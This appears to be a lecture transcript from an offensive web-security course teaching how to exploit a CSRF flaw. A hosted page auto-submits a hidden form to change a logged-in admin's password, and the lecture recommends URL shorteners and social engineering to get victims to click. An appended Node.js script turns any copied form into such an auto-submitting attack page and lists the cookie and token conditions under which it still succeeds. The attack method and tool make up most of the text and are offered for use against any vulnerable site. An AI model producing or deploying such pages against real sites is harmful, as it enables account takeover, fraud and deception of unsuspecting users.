Exploiting CSRF Vulnerabilities To Change Admin Password Using Link

Lecture Transcript - Exploiting CSRF Vulnerabilities To Change Admin Password Using Link

In the previous lecture, we saw how to create an HTML malware page that exploits a CSRF vulnerability by automatically submitting a form, and we saw how to use it to get the target person to change their password without them even knowing.

As soon as they double-click the file, the form is submitted automatically, changing the password to the one we want.

One problem with that is that it's usually a bit difficult to get people to run files, even though it's just an HTML file and you can use clever social engineering to get them to run it.

It's still a bit difficult, and it would be much easier if we could just send them a link that changes their password as soon as they click on it.

And this is actually really easy, because the file we created is an HTML file.

So all we have to do is upload that file to a web hosting company.

There is a lot of free web hosting online; you can just upload the file there.

You can use a URL shortening service as well to make the URL shorter and less suspicious, and then send it to the target person.

So I'm going to show you how to do that.

But I'm actually going to do it on my local machine, because everything for me here is local; it works on external websites exactly the same.

You'll just have to upload the page to a web host. It doesn't matter if it's free or paid, but there are a lot of free ones.

So I'm going to use my local Apache server right here, and then we're going to browse to it from our target Windows machine, and we'll see how it gets executed and how the password is changed.

Before I do anything, I'm just going to reopen the file and set the password to 777777 instead of 666666, so we know the password has been changed to the new one.

And I'll change it in here as well.

Now I'm going to copy this to my local web server on Kali.

First of all, I'm going to copy the file to my document root. The file is stored on the desktop now, so I'm going to do cp Desktop/csrf.html /var/www/html.

And now I'm going to start Apache, so I'm going to do service apache2 start.

Now everything's working, so I'm just going to get my IP address.

My IP address is 10.20.14.213, so I'm going to go to the Windows machine.

Now, on this machine I'm pretending to be the target user, so first of all I have to be logged in to my account.

So I'm just going to go to the login page and log in with my username, which is admin.

And I'm going to log in with my old password, or rather my current password, the one we reset it to previously, which is 666666.

Now, as you can see, I can log in normally.

Now I'm going to close this.

Now we're going to browse to the page that contains the CSRF exploit, so we're going to pretend that I was social engineered and someone gave me a URL to click.

So at the moment we're not going to download any file, and we're not going to double-click any file.

All we're going to do is literally just browse to a URL.

And once we do that, our password is going to be changed.

So the page, as I said, you can host on free hosting; there is a lot of free hosting online at the moment.

I have it hosted on my Kali machine, and its IP is 10.20.14.213.

And then I'm going to put the name of the page, which was csrf.html.

I'm going to hit enter.

And as you can see, it's telling me that the password has been changed, and again, all I did was open a URL. It's all down to you how you convince your target to open that URL.

So if I log out now and log in again, you'll see that I now have to log in with admin and the new password, so I'm going to type it here: 777777.

And I'm going to copy all of this and paste it down there, just so you can actually see that the password has been changed to 777777.

So the URL was http://10.20.14.213/csrf.html.

Anybody who opens this URL while logged in to the target website will be forced to change their password to 777777.

Now, you can use this method, as I said, with any website that is vulnerable to CSRF, and it'll force the user to do any action you want.

All you have to do is adapt the same method to the form.

So whether it's a payment form, a sign-up form, a submit-article form, or a form that sends a message to a friend, you just go to the website, right-click, inspect the form element, copy the form code, hide everything, and add the JavaScript code that submits the form automatically.

Then you can send the HTML file as it is to the target person, or upload it to online hosting and send the hosting URL to the target person.

Once they browse to that URL, the web page will be executed automatically, forcing them to change their password or do whatever action you want them to do.
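The procedure above (copy the form from the inspector, hide every field, submit it from JavaScript on load) as an added example that is not part of the lecture's own code: a small Node.js script that parses a copied `<form>` and emits the auto-submitting page. The target origin `http://10.20.14.5`, the path `/change_password.php` and the field names `password_new`, `password_conf` and `Change` are constructed sample values for a hypothetical vulnerable app, not a real site. It generalizes the lecture's single case to any form, which is why the submit button is carried over as a hidden field: some server-side code only acts when the button's name is present in the request.

```javascript
// Added example (not code from the lecture): turn a <form> copied out of the
// browser's inspector into the auto-submitting CSRF page the lecture describes
// (copy the form, hide every field, submit it from JavaScript on load).
// Plain Node.js, no dependencies. Host, path and field names are constructed
// sample values for a hypothetical vulnerable app, not a real target.

// Constructed sample: what "Inspect element -> Copy outerHTML" might give you
// for a password-change form (assumed path and field names).
const COPIED_FORM = `
<form action="/change_password.php" method="POST">
  New password: <input type="password" name="password_new">
  Confirm:      <input type="password" name="password_conf">
  <input type="submit" name="Change" value="Change">
</form>`;

// Read one attribute (double- or single-quoted) out of a single tag.
function attr(tag, name) {
  const re = new RegExp(`\\s${name}\\s*=\\s*(?:"([^"]*)"|'([^']*)')`, 'i');
  const m = tag.match(re);
  if (!m) return null;
  return m[1] !== undefined ? m[1] : m[2];
}

// Pull the action, method and every named field out of the copied form.
// Unnamed inputs are skipped because the browser never sends them.
function parseForm(html) {
  const formTag = html.match(/<form\b[^>]*>/i);
  if (!formTag) throw new Error('no <form> found in the copied markup');
  const fields = [];
  for (const tag of html.match(/<(?:input|select|textarea)\b[^>]*>/gi) || []) {
    const name = attr(tag, 'name');
    if (name) fields.push({ name, value: attr(tag, 'value') || '' });
  }
  return {
    action: attr(formTag[0], 'action') || '',
    method: (attr(formTag[0], 'method') || 'GET').toUpperCase(),
    fields,
  };
}

// Escape a value before putting it back into an HTML attribute.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// Build the page: the form now points at the target's absolute URL, every
// field (including the submit button, whose name the server may check) is a
// hidden input carrying the attacker's value, and a script submits it on load.
function buildCsrfPage(form, targetOrigin, overrides) {
  const action = /^https?:\/\//i.test(form.action) ? form.action : targetOrigin + form.action;
  const out = [`<form id="csrf" action="${escapeHtml(action)}" method="${escapeHtml(form.method)}">`];
  for (const f of form.fields) {
    const value = Object.prototype.hasOwnProperty.call(overrides, f.name) ? overrides[f.name] : f.value;
    out.push(`  <input type="hidden" name="${escapeHtml(f.name)}" value="${escapeHtml(value)}">`);
  }
  out.push('</form>', '<script>document.getElementById("csrf").submit();</script>');
  return `<!DOCTYPE html>\n<html><body>\n${out.join('\n')}\n</body></html>\n`;
}

// Stand-alone run: print the page to save as csrf.html (assumed target origin).
if (typeof require !== 'undefined' && require.main === module) {
  const form = parseForm(COPIED_FORM);
  process.stdout.write(buildCsrfPage(form, 'http://10.20.14.5', {
    password_new: '777777',
    password_conf: '777777',
  }));
}
```

Save the output as the page you host (the lecture's `csrf.html`) and the rest of the procedure is unchanged. Two things decide whether the trick works at all: the target's form must carry no per-session anti-CSRF token (the script copies a token value from the inspector, but the server would reject a stale one), and the victim's browser must attach the session cookie to a cross-site POST. Browsers that default cookies to SameSite=Lax (Chrome has done so since 2020 for cookies set without a SameSite attribute) withhold the cookie on a cross-site top-level POST, apart from Chrome's short-lived exception for cookies set within the last two minutes, so a classic CSRF page like this one increasingly only works against apps whose cookies are explicitly SameSite=None or whose password change accepts GET.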

